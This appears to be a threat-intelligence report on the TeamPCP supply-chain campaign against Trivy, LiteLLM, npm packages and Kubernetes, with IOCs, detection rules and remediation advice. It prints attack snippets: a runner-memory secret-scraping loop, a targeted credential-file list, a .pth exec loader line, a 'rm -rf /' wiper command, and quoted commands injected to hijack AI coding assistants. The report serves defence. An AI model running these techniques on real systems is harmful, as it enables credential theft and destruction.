Anatomy of a Supply Chain Siege — How TeamPCP Compromised Trivy, LiteLLM, and 66 npm Packages in 5 Days

Threat ID: TL-2026-0280 | CVE: CVE-2026-33634 | CVSS: 9.4 | Severity: CRITICAL | Status: ACTIVE

Actor: TeamPCP (aliases: DeadCatx3, PCPcat, ShellForce, CanisterWorm) | Motivation: DESTRUCTION

MITRE Techniques: 29 | Detections: 81+ across 8 threat reports | Ecosystems Compromised: 5 (GitHub Actions, npm, PyPI, Docker Hub, OpenVSX)

Between March 19 and March 24, 2026, a threat actor collective operating under the name TeamPCP executed the most consequential supply chain campaign of the year. Five software ecosystems were breached. Aqua Security's Trivy vulnerability scanner -- used across thousands of CI/CD pipelines worldwide -- was the entry point. From there, the campaign expanded to LiteLLM on PyPI, 66 npm packages via a self-propagating worm, Kubernetes clusters via destructive DaemonSets, and Checkmarx KICS GitHub Actions. The attack chain introduced a novel command-and-control mechanism built on the Internet Computer Protocol blockchain, a technique with no prior documented precedent.

This report consolidates intelligence from TL-2026-0280, TL-2026-0279, TL-2026-0270, TL-2026-0263, TL-2026-0256, and TL-2026-0165 into a single deep technical analysis of the full campaign lifecycle.

Executive Summary

• What: A coordinated five-day supply chain siege targeting Trivy, LiteLLM, 66+ npm packages, Kubernetes clusters, and Checkmarx KICS -- credential-stealing malware injected into CI/CD pipelines via compromised GitHub Actions tags, Docker Hub images, and package registries
• Who: TeamPCP (DeadCatx3, PCPcat, ShellForce), building on access residual from the hackerbot-claw VS Code extension compromise 19 days earlier
• Impact: Thousands of CI/CD pipelines pulled poisoned code. Every pipeline that referenced trivy-action or setup-trivy by mutable version tag executed the credential stealer. AES-256-CBC/RSA-4096 hybrid encryption protected exfiltrated secrets in transit
• Novel Tradecraft: First documented abuse of ICP (Internet Computer Protocol) blockchain canisters as C2 dead drop resolvers; self-propagating npm worm (CanisterWorm) using stolen publisher tokens; Python .pth file persistence in LiteLLM
• Detection: 81+ production-ready detection rules available across 8 threat reports on Threadlinqs Intelligence

The Genesis -- From hackerbot-claw to TeamPCP

The campaign did not begin on March 19. It began on February 28, when an automated bot named hackerbot-claw (TL-2026-0165) exploited a misconfigured pull_request_target workflow in the Trivy GitHub repository. The workflow granted fork pull requests access to repository secrets -- a well-documented anti-pattern that hackerbot-claw systematically scanned for across thousands of repositories. The bot extracted a privileged Personal Access Token (PAT) belonging to the Argon-DevOps-Mgt service account (GitHub ID 139343333), an automation credential that bridged two Aqua Security GitHub organizations.

Aqua Security's response to the initial compromise included publishing malicious VS Code extension versions 1.8.12 and 1.8.13 to the OpenVSX registry, which contained injected commands targeting AI coding assistants -- claude -p --dangerously-skip-permissions, codex exec --ask-for-approval never -- and exfiltrating tokens to recv.hackmoltrepeat.com. A former Aqua employee revoked the publishing token and removed affected versions by 22:46 UTC on February 28. Aqua then began credential rotation.

The rotation was incomplete. The Argon-DevOps-Mgt PAT was rotated, but the rotation was non-atomic -- during the multi-day rotation window, TeamPCP was able to exfiltrate the newly rotated credentials before the process completed. This is the operational security failure that enabled everything that followed. Nineteen days of residual access, undetected. The new credentials were valid. The old ones were revoked. But TeamPCP already had the new ones.

Day-by-Day Campaign Timeline

Technical Deep Dive -- The Malicious entrypoint.sh

The core of the Trivy compromise was a replacement entrypoint.sh injected into trivy-action. The legitimate file was 2,855 bytes. The malicious replacement was 17,592 bytes -- 204 lines of credential-harvesting code disguised within cosmetic changes (quote standardization, whitespace normalization) to the original script.

SHA-256 hashes for forensic comparison:

Stage 1 -- Runner Memory Scanning

On GitHub-hosted runners, the malware exploits Linux's /proc filesystem to scan process memory of the Runner.Worker process. This process holds all workflow secrets in memory -- including those marked with isSecret:true in the GitHub Actions runner. The technique:

BASH# Enumerate GitHub Actions runner processes
for pid in /proc/[0-9]*; do
    cmdline=$(cat "$pid/cmdline" 2>/dev/null | tr '\0' ' ')
    if echo "$cmdline" | grep -q "Runner.Worker"; then
        # Read process memory regions from /proc/$pid/mem
        # Parse for isSecret:true flagged values
        cat "$pid/mem" 2>/dev/null | strings | grep -E "(GITHUB_TOKEN|AWS_|AZURE_|GCP_)"
    fi
done

This is not theoretical. The Runner.Worker process stores all injected secrets in a flat memory structure that can be read by any process running as the same user -- which includes every step in a GitHub Actions workflow. The isSecret:true flag is a UI-level masking mechanism, not a security boundary.

Stage 2 -- Credential File Enumeration

The malware enumerates 50+ credential file paths across the filesystem, targeting every major cloud provider and development tool:

• ~/.ssh/id_rsa, ~/.ssh/id_ed25519, ~/.ssh/authorized_keys -- SSH keys
• ~/.aws/credentials, ~/.aws/config -- AWS credentials
• ~/.kube/config -- Kubernetes cluster access
• ~/.docker/config.json -- Docker registry authentication
• terraform.tfstate, terraform.tfvars -- Terraform infrastructure secrets
• ~/.npmrc -- npm publish tokens (enabling CanisterWorm propagation)
• ~/.pypirc -- PyPI publish tokens (enabling LiteLLM compromise)
• ~/.gnupg/ -- GPG signing keys
• ~/.config/gcloud/ -- GCP credentials
• ~/.azure/ -- Azure credentials
• ~/.vault-token -- HashiCorp Vault tokens
• Cryptocurrency wallet files, browser credential stores, CI/CD platform tokens

Stage 3 -- Encryption and Exfiltration

Harvested credentials are bundled into a tpcp.tar.gz archive, encrypted with AES-256-CBC, and the AES key itself is encrypted with RSA-4096 -- a hybrid encryption scheme that ensures only TeamPCP can decrypt the exfiltrated data, even if the archive is intercepted in transit. The encrypted bundle is exfiltrated via HTTPS POST to scan.aquasecurtiy.org (note the deliberate typosquat of "security") with a custom X-Filename: tpcp.tar.gz header. If the primary C2 is unreachable, the malware falls back to creating a public GitHub repository named tpcp-docs on the victim's account and uploading the archive as a release asset.

Novel C2 -- ICP Blockchain Dead Drops

TeamPCP's campaign introduced the first documented abuse of Internet Computer Protocol (ICP) canisters as a command-and-control dead drop resolver. This represents a significant evolution in C2 architecture -- one that existing network security tooling is not equipped to detect.

ICP is a blockchain-based computing platform where "canisters" (smart contracts) can host arbitrary data and logic on a decentralized network. TeamPCP deployed canister tdtqy-oyaaa-aaaae-af2dq-cai on the IC mainnet, accessible via tdtqy-oyaaa-aaaae-af2dq-cai.raw.icp0.io. The canister exposes two methods:

• get_latest_link -- Returns the current C2 endpoint URL
• update_link -- Allows TeamPCP to rotate the C2 endpoint

The infected payload polls the canister every 50 minutes, retrieving the latest C2 URL. This architecture provides several advantages to the attacker:

• Takedown resistance: Blockchain state cannot be unilaterally modified by any single authority. The canister persists until the ICP governance system acts
• Domain agility: The actual C2 endpoint can be rotated without modifying the malware payload
• Attribution difficulty: ICP canister deployment requires ICP tokens but no identity verification
• Detection evasion: Traffic to icp0.io and ic0.app domains appears as legitimate Web3/blockchain activity

When the ICP canister was marked "Unavailable Due to Policy Violation" at 21:31 UTC on March 22, the malware fell back to Cloudflare tunnel endpoints -- four distinct tunnels were identified:

The Self-Propagating npm Worm -- CanisterWorm

CanisterWorm is a self-propagating malware component that leverages stolen npm publisher tokens harvested from CI/CD environments to automatically publish malicious versions of legitimate packages. The name derives from its ICP canister-based C2 polling mechanism.

The worm's propagation model: when the Trivy credential stealer runs in a CI/CD pipeline that builds npm packages, it harvests the .npmrc authentication token. CanisterWorm then uses that token to publish a new patch version of every package the compromised publisher maintains. The malicious version contains a Python implant that:

1. Drops ~/.config/sysmon/sysmon.py -- a persistence loader masquerading as a system monitoring tool
2. Creates ~/.config/systemd/user/sysmon.service -- a systemd user service that runs the loader on boot
3. Runs systemctl --user enable sysmon.service for persistence
4. Downloads the follow-on payload from checkmarx.zone to /tmp/pglog, named to appear as a PostgreSQL log file
5. Maintains state tracking via /tmp/.pg_state

The campaign ultimately compromised 66+ packages across five npm scopes: @EmilGroup, @teale.io, @opengov, @airtm, and @pypestream. Socket.dev classified 141+ malicious artifacts total. The worm represents a force multiplier -- each compromised CI/CD pipeline becomes a propagation vector for additional package compromises.

LiteLLM .pth Persistence

The LiteLLM compromise on PyPI (v1.82.7 and v1.82.8) introduced a persistence technique specific to the Python ecosystem: .pth file injection.

Python's .pth files in site-packages directories are processed at interpreter startup. Any line beginning with import is executed as Python code. Version 1.82.8 dropped a file named litellm_init.pth into the site-packages directory containing:

PYTHONimport os; exec(os.popen('python3 -c "exec(__import__(\'base64\').b64decode(__import__(\'base64\').b64decode(b\'...payload...\')))"').read())

The payload is double base64-encoded -- decoding the outer layer reveals another base64 blob, which when decoded produces the credential harvester. This means the malicious code executes every time Python starts on a system where the compromised LiteLLM is installed -- not just when LiteLLM is explicitly imported. The v1.82.7 variant used a simpler approach: injecting a decoded p.py dropper directly into LiteLLM's package initialization.

Exfiltration used the same AES-256-CBC/RSA-4096 hybrid encryption scheme, with a new endpoint at models.litellm.cloud replacing the typosquatted Aqua Security domain. PyPI quarantined both versions approximately 3 hours after publication -- a window sufficient for automated pip installations in CI/CD to pull the poisoned packages.

Kubernetes Wipers

The most destructive phase of the campaign targeted Kubernetes clusters. Two distinct DaemonSet payloads were identified:

host-provisioner-iran -- Targeted Destruction

This DaemonSet was configured with geographic targeting. When deployed to clusters with Iranian locale indicators, the privileged container executes:

BASHrm -rf / --no-preserve-root

The DaemonSet specification requests privileged: true, hostPID: true, and hostNetwork: true -- granting full access to the underlying host filesystem, process namespace, and network stack. The "kamikaze" container destroys itself along with the host. Nation-state targeting in a supply chain worm is unusual and raises questions about TeamPCP's motivations beyond simple destruction.

host-provisioner-std -- Persistent Backdoor

The standard variant deploys across all clusters without geographic filtering. Rather than destruction, it establishes persistent access by:

• Deploying privileged pods with naming pattern node-setup-*
• Mounting the host filesystem at /host
• Installing a reverse shell that polls Cloudflare tunnel endpoints every 5 minutes
• Spreading to other clusters via harvested kubeconfig files

Both DaemonSets exploit the same privilege escalation path: Kubernetes clusters that allow privileged pod deployment without admission controller enforcement. A Pod Security Standard of "restricted" or a properly configured OPA Gatekeeper policy would have blocked both payloads.

Indicators of Compromise

Network Indicators

File Indicators

Affected Packages and Images

Behavioral Indicators

• Runner.Worker process memory access via /proc/<pid>/mem -- GitHub Actions secret extraction
• tpcp.tar.gz archive creation with X-Filename HTTP header in exfiltration requests
• tpcp-docs repository creation on victim GitHub accounts -- fallback exfiltration dead drop
• pgmon / PgMonitor scheduled task or systemd service -- persistence masquerading as PostgreSQL monitoring
• ~/.config/sysmon.py Python loader with sysmon.service systemd persistence
• /tmp/pglog binary dropped from checkmarx.zone
• Kubernetes DaemonSets with privileged: true + hostPID: true + hostNetwork: true
• litellm_init.pth file in Python site-packages directory
• GitHub commit SHAs: e0198fd2b6e1679e36d32933941182d9afa82f6f, ddb9da4475c1cef7d5389062bdfdfbdbd1394648, 8afa9b9f9183b4e00c46e2b82d34047e3c177bd0

Detection Rules

Threadlinqs Intelligence provides 81+ production-ready detection rules across 8 threat reports tracking this campaign. Below are three representative rules targeting the most distinctive tradecraft elements.

Splunk SPL -- GitHub Actions Runner Memory Scanning

This rule detects the core credential harvesting technique: processes reading /proc/<pid>/mem of GitHub Actions Runner.Worker processes. This is the highest-signal indicator of the Trivy compromise -- legitimate processes do not read runner memory.

SPLindex=sysmon sourcetype="XmlWinEventLog:Microsoft-Windows-Sysmon/Operational"
    (EventCode=1 OR EventCode=10)
| search (CommandLine="*cat /proc/*/environ*"
    OR CommandLine="*/proc/*/mem*"
    OR CommandLine="*Runner.Worker*"
    OR CommandLine="*Runner.Listener*"
    OR CommandLine="*runsvc*")
| where match(CommandLine,
    "(?i)(proc/.*/environ|proc/.*/mem|Runner\.Worker|Runner\.Listener|runsvc)")
| eval risk_score=case(
    match(CommandLine, "proc/.*/mem"), 95,
    match(CommandLine, "proc/.*/environ"), 90,
    1=1, 80
)
| stats count min(_time) as first_seen max(_time) as last_seen
    values(CommandLine) as commands dc(ComputerName) as host_count
    by User, ParentImage
| where risk_score > 80
| sort -risk_score

KQL -- Python .pth File Injection Detection

Detects the LiteLLM persistence mechanism where a malicious .pth file is written to Python's site-packages directory. Legitimate .pth files are created during package installation, not dynamically at runtime. The presence of exec( or os.popen in a .pth file is definitively malicious.

KQLDeviceFileEvents
| where Timestamp > ago(30d)
| where FileName endswith ".pth"
| where FolderPath has "site-packages"
| where ActionType in ("FileCreated", "FileModified")
| where InitiatingProcessFileName !in ("pip", "pip3", "python", "python3",
    "conda", "poetry", "pipx", "setup.py")
| join kind=leftouter (
    DeviceFileEvents
    | where FileName endswith ".pth"
    | where FolderPath has "site-packages"
    | extend FileContentSample = tostring(parse_json(AdditionalFields).FileContent)
    | where FileContentSample has_any ("exec(", "os.popen", "subprocess",
        "base64.b64decode", "__import__")
) on DeviceId, FileName
| project Timestamp, DeviceName, FileName, FolderPath,
    InitiatingProcessFileName, InitiatingProcessCommandLine
| sort by Timestamp desc

Sigma -- ICP Canister C2 Communication

Detects outbound connections to ICP blockchain infrastructure used as C2 dead drop resolvers. While ICP traffic may have legitimate uses, connections to icp0.io or ic0.app from CI/CD runners or server infrastructure should be treated as anomalous.

SIGMAtitle: ICP Blockchain Canister C2 Communication — TeamPCP Campaign
id: f8c2a1b7-3d9e-4f5a-b6c8-7e2d1a9f3c45
status: experimental
description: |
    Detects outbound connections to Internet Computer Protocol (ICP)
    blockchain infrastructure. TeamPCP campaign used canister
    tdtqy-oyaaa-aaaae-af2dq-cai as a dead drop C2 resolver.
    First documented abuse of ICP for command-and-control.
references:
    - https://intel.threadlinqs.com/#TL-2026-0280
    - https://intel.threadlinqs.com/#TL-2026-0279
author: Threadlinqs Intel Team
date: 2026/03/25
tags:
    - attack.command_and_control
    - attack.t1102
    - attack.t1071.001
    - attack.t1573
logsource:
    category: proxy_access
    product: any
detection:
    selection_icp_domains:
        c-uri|contains:
            - 'icp0.io'
            - 'ic0.app'
            - 'raw.icp0.io'
    selection_known_canister:
        c-uri|contains:
            - 'tdtqy-oyaaa-aaaae-af2dq-cai'
    selection_canister_methods:
        c-uri|contains:
            - 'get_latest_link'
            - 'update_link'
    condition: selection_known_canister or selection_canister_methods
        or (selection_icp_domains and not filter)
    filter:
        c-useragent|contains:
            - 'dfx'
            - 'ic-agent'
falsepositives:
    - Developers working with ICP/DFINITY ecosystem
    - Web3 applications with legitimate ICP integration
level: high

Browse all 81+ detection rules across 8 related threat reports: View on Threadlinqs Intelligence

MITRE ATT&CK Mapping

Full MITRE ATT&CK mapping with technique-level detail: View coverage on Threadlinqs

Recommendations

1. Pin GitHub Actions to immutable commit SHAs. The entire Trivy tag-poisoning attack is defeated by a single practice: referencing Actions by full commit SHA (uses: aquasecurity/trivy-action@abc123def) rather than mutable version tags (uses: aquasecurity/trivy-action@v1). Mutable tags are pointers that can be force-pushed to arbitrary commits. Commit SHAs cannot. This is the highest-impact remediation for any organization running CI/CD on GitHub.
2. Audit all CI/CD pipelines for Trivy, LiteLLM, KICS, and affected npm packages. Check GitHub Actions workflow files for any reference to trivy-action, setup-trivy, kics-github-action, or ast-github-action. Verify Docker images are not pinned to 0.69.4, 0.69.5, or 0.69.6. Confirm LiteLLM is not installed at versions 1.82.7 or 1.82.8. Scan node_modules for packages from @EmilGroup, @teale.io, @opengov, @airtm, and @pypestream scopes.
3. Rotate all credentials that were accessible to compromised pipelines. Any secret that was available to a GitHub Actions workflow using trivy-action or setup-trivy between March 19-20 should be considered compromised. This includes cloud provider credentials, SSH keys, Docker registry tokens, npm publish tokens, Terraform state secrets, and Kubernetes cluster credentials. Rotation must be atomic -- complete all rotations before revoking old credentials.
4. Block ICP blockchain domains at the network perimeter. Add icp0.io, ic0.app, and raw.icp0.io to proxy deny lists for CI/CD runner networks and server infrastructure. Legitimate ICP development should be explicitly allowlisted by team and project. Monitor for connections to any trycloudflare.com subdomain from non-interactive systems.
5. Implement Kubernetes admission controllers. Deploy Pod Security Standards at the "restricted" level or OPA Gatekeeper policies that deny privileged: true, hostPID: true, and hostNetwork: true containers. Both TeamPCP wiper variants require all three privileges to execute their payloads. Audit existing DaemonSets for unexpected privileged containers.
6. Scan Python environments for .pth file injection. Enumerate all .pth files in site-packages directories across development machines, CI/CD runners, and production servers. Any .pth file containing exec(, os.popen, subprocess, or base64.b64decode is definitively malicious. Legitimate .pth files contain only directory paths or import statements for standard packages.
7. Deploy supply chain security tooling with real-time alerting. Tools like Socket.dev, Snyk, StepSecurity Harden-Runner, and Datadog Software Composition Analysis detected aspects of this campaign within hours. Integrate at least one supply chain monitoring solution into CI/CD pipelines with blocking enabled for known-malicious packages. Configure alerts for unexpected version publications of internal packages.

Related Threat Reports

References

• Aqua Security -- Trivy GitHub Action Supply Chain Attack Disclosure -- Aqua Security, March 2026
• CrowdStrike -- Analysis of Trivy Supply Chain Compromise -- CrowdStrike, March 2026
• Wiz -- Trivy Supply Chain Attack: What You Need to Know -- Wiz, March 2026
• Socket Security -- 182 Malicious GitHub Actions Threat Feed Entries Detected -- Socket.dev, March 2026
• StepSecurity -- hackerbot-claw Campaign Analysis -- StepSecurity, March 2026
• Datadog Security Labs -- TeamPCP Multi-Ecosystem Supply Chain Campaign -- Datadog, March 2026
• Snyk -- TeamPCP LiteLLM and npm Supply Chain Analysis -- Snyk, March 2026
• Flare -- TeamPCP Cloud-Native Worm Campaign Threat Profile -- Flare, February 2026
• GitHub -- aquasecurity/trivy-action Discussion #10420 -- Community disclosure thread
• NVD -- CVE-2026-33634 -- CVSS 9.4 Critical

Full threat intelligence, detection rules, IOC feeds, and simulation playbooks are available on Threadlinqs Intelligence. Track this campaign across all 8 related threat reports: TL-2026-0280.